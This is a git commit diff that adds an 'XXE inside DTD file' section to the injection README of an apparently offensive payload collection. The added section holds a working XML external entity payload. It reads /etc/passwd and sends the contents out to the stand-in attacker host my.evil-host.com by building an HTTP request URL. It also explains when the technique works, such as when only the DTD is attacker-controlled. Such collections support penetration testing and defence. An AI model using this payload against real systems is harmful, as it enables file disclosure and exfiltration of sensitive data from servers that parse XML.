Add XXE via DTD file

2024-04-26 07:35:32 +02:00 · 2021-01-25 11:50:47 -05:00 · 2021-01-25 11:50:47 -05:00 · 92667a12a4
parent 4c7dd435a6
commit 92667a12a4
1 changed files with 16 additions and 0 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -31,6 +31,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
  - [XXE inside SOAP](#xxe-inside-soap)
  - [XXE inside DOCX file](#xxe-inside-docx-file)
  - [XXE inside XLSX file](#xxe-inside-xlsx-file)
+  - [XXE inside DTD file](#xxe-inside-dtd-file)
 - [XXE WAF Bypass via convert character encoding](#xxe-waf-bypass-via-convert-character-encoding)

 ## Tools
@ -516,6 +517,21 @@ updating: xl/_rels/workbook.xml.rels (deflated 66%)
 updating: xl/sharedStrings.xml (deflated 17%)
 ```

+### XXE inside DTD file
+
+Most XXE payloads detailed above require control over both the DTD or `DOCTYPE` block as well as the `xml` file.
+In rare situations, you may only control the DTD file and won't be able to modify the `xml` file. For example, a MITM.
+When all you control is the DTD file, and you do not control the `xml` file, XXE may still be possible with this payload.
+
+```xml
+<!-- Load the contents of a sensitive file into a variable -->
+<!ENTITY % payload SYSTEM "file:///etc/passwd">
+<!-- Use that variable to construct an HTTP get request with the file contents in the URL -->
+<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://my.evil-host.com/x=%payload;">'>
+%param1;
+%external;
+```
+
 ### XXE WAF Bypass via convert character encoding

 In XXE WAFs, DTD Prolog are usually blacklisted BUT not all WAFs blacklist the UTF-16 character encoding<br><br>